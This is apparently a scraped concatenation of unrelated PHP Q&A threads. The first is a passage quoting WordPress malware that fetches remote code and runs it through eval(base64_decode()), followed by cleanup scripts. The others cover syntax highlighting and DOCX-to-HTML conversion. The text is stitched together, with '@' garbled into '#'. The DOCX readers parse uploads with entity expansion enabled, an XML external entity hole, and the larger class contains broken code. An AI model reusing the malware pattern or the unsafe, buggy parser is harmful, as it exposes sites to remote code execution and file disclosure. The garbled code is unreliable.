$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
So without having to access your server again, they can execute different code.
Dan Hill wrote an article about getting base64 hacked for WordPress installations.
To quote the results of Dan's findings:
The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.
To get rid of the problem, Dan tried the following:
I did this in three stages. First, find any world-writable directories (tsk tsk):
find . -type d -perm -o=w
And make them not world writable:
find . -type d -perm -o=w -print -exec chmod 770 {} \;
Delete all the new files these guys created:
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
(In wordpress, the uploads folder shouldn’t contain any PHP)
Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this run this ruby script from your root directory:
#!/usr/bin/env ruby
Dir.glob('**/*.php').each do|f|
puts f
begin
contents = File.read(f)
contents = contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "")
File.open(f, 'w') {|f| f.write(contents) }
rescue
puts "FILE ERROR"
end
end
The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.
Hope Dan's findings help!
For those searching for a non-Ruby fix, here's a PHP version of Dan Hill's code:
<?php
function fileExtension($filename) {
$pathInfo = pathinfo($filename);
return strtolower($pathInfo['extension']);
}
function fixFiles($path) {
$path = str_replace('././', './', $path);
$d = #opendir($path);
if ($d) {
while (($entry = readdir($d)) !== false) {
$baseEntry = $entry;
$entry = str_replace('././', './', $path . '/' . $entry);
if ($baseEntry != '.' && $baseEntry != '..') {
if (is_file($entry)) {
$fe = fileExtension($entry);
if ($fe == 'php') {
$contents = file_get_contents($entry);
$contents = preg_replace("/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/", '', $contents);
$f = fopen($entry, 'w');
fputs($f, $contents);
fclose($f);
echo $entry . '<br>';
flush();
}
}
else if (is_dir($entry)) {
fixFiles($path . '/' . basename($entry));
}
}
}
closedir($d);
}
}
fixFiles('.');
?>

Display files with syntax highlighting using PHP

I am working on a web based application using php (not using Java), in which I am required to display source code files (java,c,c++,Python etc..) with syntax highlighting on the web page. I am clueless on as to how to display the source code files. Any help will be appreciated.
One of the options is use a existing syntax highlighter like a google one.
Setting it up is very simple. All you have to do for basic usage is include the code in your html page in <pre> sections and apply a class attribute that is programming language.
<pre name="code" class="c-sharp">
class Foo
{
}
</pre>
16 Free Javascript Code Syntax Highlighters For Better Programming has a very exhaustive list of lot of options. repeated here in case the site ever goes down
SyntaxHighlighter
GeSHi - Generic Syntax Highlighter
quickhighlighter
google-code-prettify
pygments.
HIGHLIGHT.JS
Lighter.js – Syntax Highlighter written in MooTools
SHJS – Syntax Highlighting in JavaScript
CodePress – Online Real Time Syntax Highlighting Editor
Chili jQuery code highlighter plugin
Highlight – Code & Syntax highlighting by Andre Simon
BeautyOfCode: jQuery Plugin for Syntax Highlighting
JUSH – JavaScript Syntax Highlighter
Ultraviolet – Syntax Highlighting Engine
DlHighlight – JavaScript Syntax Highlighting Engine
Syntax highlighter for JavaScript
Syntax highlighter is used to show the source code program is colorful, so the reader can easily read/understand your code after integration. In this program, I added various elements (reserve words, parenthesis, comment, and quotes etc..) for highlighting. You can add/modify this code based on your Web Application/Programming Blog.
This syntax highlighter code is independent to any language, so you add integration with any programming language.
Please find the source code from my tech blog - http://www.algonuts.info/how-to-develop-a-source-code-syntax-highlighter-using-php.html
<?php
include_once("keywords.php");
class highlighter {
private $fileName;
private $fileNameColor;
private $fileExtension;
private $parenthesisColor;
private $insideParenthesisColor;
private $keywordColor;
private $backGroundColor;
private $borderColor;
private $leftBorderColor;
private $quotesColor;
private $commentColor;
public function __construct() {
$this->fileName = "";
$this->fileExtension = "";
//Color Configuration
$this->fileNameColor = "#286090";
$this->keywordColor = "green";
$this->backGroundColor = "#fdfefe";
$this->borderColor = "#e3e3e3";
$this->leftBorderColor = "#605a56";
$this->parenthesisColor = "#ec7700";
$this->insideParenthesisColor = "#ec7700";
$this->bracketColor = "#ec7700";
$this->insideBracketColor = "#ec7700";
$this->quotesColor = "#6a2c70";
$this->commentColor = "#b8b0b0";
}
public function applycolor($fileLocation = "") {
if($fileLocation == "")
{ return; }
else
{
if(file_exists($fileLocation)) {
$temp = explode("/",$fileLocation);
$this->fileName = trim(end($temp));
$temp = explode(".",$this->fileName);
$this->fileExtension = trim(end($temp));
$fileContent = trim(file_get_contents($fileLocation, true));
$fileContent = htmlentities($fileContent,ENT_NOQUOTES);
if($fileContent == "")
{ return; }
}
else
{ return; }
}
$line = 1;
$outputContent = "<div class=\"divblock\"><b>".$line."</b> ";
$characterBuffer = "";
$blockFound = 0;
$blockFoundColor = array();
$parenthesisFound = 0;
$bracketFound = 0;
$counter = 0;
$lastCharacter = "";
$contentSize = strlen($fileContent);
while($counter < $contentSize) {
$character = $fileContent[$counter];
$code = intval(ord($character));
if($blockFound == 0 && (($code >= 97 && $code <= 122) || ($code >= 65 && $code <= 90))) //Fnd alphabetic characters
{ $characterBuffer .= $character; }
else
{
if($code == 10) { //Find EOL (End of Line)
if($this->checker($characterBuffer))
{ $characterBuffer = "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
$line++;
if($blockFound == 0)
{ $outputContent .= $characterBuffer."</div>".$character."<div class=\"divblock\"><b>".$line."</b> "; }
else
{ $outputContent .= $characterBuffer."</font></div>".$character."<div class=\"divblock\"><b>".$line."</b> <font color='".$blockFoundColor[$blockFound-1]."'>"; }
$characterBuffer = "";
}
else if($code == 32) { //Find Space
if($characterBuffer != "") {
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>".$character; }
else
{ $outputContent .= $characterBuffer.$character; }
$characterBuffer = "";
}
else
{ $outputContent .= $character; }
}
else if($character == "\"" || $character == "'") { //Find Quotes
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
$outputContent .= "<font color='".$this->quotesColor."'>".$character;
$foundCharacter = $character;
$counter++;
while($counter < $contentSize) {
$character = $fileContent[$counter];
if($character == $foundCharacter) {
$outputContent .= $character;
if($lastCharacter == "\\") {
$lastCharacter = "";
}
else
{ break; }
}
else if($character == "\\" && $lastCharacter == "\\") {
$outputContent .= $character;
$lastCharacter = "";
}
else
{
$lastCharacter = $character;
$code = intval(ord($character));
if($code != 10)
{ $outputContent .= $character; }
else
{
$line++;
$outputContent .= "</font></div>".$character."<div class=\"divblock\"><b>".$line."</b> <font color='".$this->quotesColor."'>";
}
}
$counter++;
}
$outputContent .= "</font>";
}
else if($character == "(" || $character == ")") { //Find Parenthesis
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
if($parenthesisFound == 0) {
$blockFoundColor[$blockFound] = $this->insideParenthesisColor;
$outputContent .= "<font color='".$this->parenthesisColor."'>".$character."</font><font color='".$this->insideParenthesisColor."'>";
$parenthesisFound++;
$blockFound++;
}
else
{
if($character == "(") {
$parenthesisFound++;
}
if($character == ")") {
$parenthesisFound--;
}
if($parenthesisFound == 0) {
$outputContent .= "</font><font color='".$this->parenthesisColor."'>".$character."</font>";
$blockFound--;
unset($blockFoundColor[$blockFound]);
}
else
{ $outputContent .= $character; }
}
}
else if($character == "[" || $character == "]") { //Find Bracket
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
if($bracketFound == 0) {
$blockFoundColor[$blockFound] = $this->insideBracketColor;
$outputContent .= "<font color='".$this->bracketColor."'>".$character."</font><font color='".$this->insideBracketColor."'>";
$bracketFound++;
$blockFound++;
}
else
{
if($character == "[") {
$bracketFound++;
}
if($character == "]") {
$bracketFound--;
}
if($bracketFound == 0) {
$outputContent .= "</font><font color='".$this->bracketColor."'>".$character."</font>";
$blockFound--;
unset($blockFoundColor[$blockFound]);
}
else
{ $outputContent .= $character; }
}
}
else if($character == "/" && (isset($fileContent[$counter+1]) && ($fileContent[$counter+1] == "*" || $fileContent[$counter+1] == "/"))) { //Find Comment
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
$blockFound++;
$outputContent .= "<font color='".$this->commentColor."'>".$fileContent[$counter].$fileContent[$counter+1];
if($fileContent[$counter+1] == "*") {
$counter += 2;
$checkCharacter = "*";
while($counter < $contentSize) {
$outputContent .= $fileContent[$counter];
if($fileContent[$counter] == $checkCharacter) {
if($checkCharacter == "*")
{ $checkCharacter = "/"; }
else
{
$blockFound--;
$outputContent .= "</font>";
break;
}
}
$counter++;
}
}
else
{
$counter += 2;
while($counter < $contentSize) {
$character = $fileContent[$counter];
$code = intval(ord($character));
if($code == 10) {
$counter--;
$blockFound--;
$outputContent .= "</font>";
break;
}
$outputContent .= $character;
$counter++;
}
}
}
else if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>".$character; }
else
{ $outputContent .= $characterBuffer.$character; }
$characterBuffer = "";
}
else
{ $outputContent .= $character; }
}
$counter++;
}
$outputContent .= "</div>";
$rerurnData = "<div class='filenamestyle' style='color:".$this->fileNameColor.";'>".$this->fileName."</div>"; //Show filename
$rerurnData .= "<div><pre><div class='codebox' style='background-color:".$this->backGroundColor.";border: 1px solid ".$this->borderColor.";border-left: 4px solid ".$this->leftBorderColor.";'>".$outputContent."</div></pre></div>";
return $rerurnData;
}
private function checker($value) {
global $languageKeywords;
if(isset($languageKeywords[$this->fileExtension])) {
$value = trim($value);
if(in_array($value,$languageKeywords[$this->fileExtension]))
{ return 1; }
else
{ return 0; }
}
}
}
?>

PHP DOCX convert to HTML [duplicate]

I want to be able to upload an MS word document and export it a page in my site.
Is there any way to accomplish this?
//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = DOMDocument::loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
$contents = explode('\n',strip_tags($xml->saveXML()));
$text = '';
foreach($contents as $i=>$content) {
$text .= $contents[$i];
}
return $text;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument are both inside PHP so you don't need to install/include/require additional libraries.
One may use PHPDocX.
It has support for practically all HTML CSS styles. Moreover you may use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML.
The HTML methods of PHPDocX also allow for the direct use of Word styles. You may use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
If you want that all your tables use the MediumGrid3-accent5 Word style. The embedHTML method as well as its version for templates (replaceTemplateVariableByHTML) preserve inheritance, meaning by that that you may use a predefined Word style and override with CSS any of its properties.
You may also extract selected parts of your HTML using 'JQuery type' selectors.
You can convert Word docx documents to html using Print2flash library. Here is an PHP excerpt from my client's site which converts a document to html:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts a document which path is specified in $wordfile variable to a html page file specified by $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file altogether with a fuller sample from Print2flash SDK.
this is a workaround based on David Lin's answer above
removing "w:" in a docx's xml tags leave behing Html like tags
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
Ok Im in very late, but thought I'd post this to save you all some time.
This is some php code I have put together not just to read the text from docx but the images too, currently it does not support floating images / text, but what I have done so far is a massive move forwards to whats already been posted on here - note you need to update https://example.co.uk to YOUR domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->savepath . $imagename;
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
}
//push style to the array of styles
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process text alignment
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "word-spacing:" . 10 . "px;";
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
$bval = $prchildnode->attributes->getNamedItem('before')->nodeValue;
if (strcmp($bval, '') == 0)
$bval = 0;
$pitem->innerstyle .= "padding-top:" . $bval . "px;";
$aval = $prchildnode->attributes->getNamedItem('after')->nodeValue;
if (strcmp($aval, '') == 0)
$aval = 0;
$pitem->innerstyle .= "padding-bottom:" . $aval . "px;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "text-weight: 500;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "text-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
if (strpos($imgpathdef->extractedpath, $rel->Target) >= 0)
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>

Categories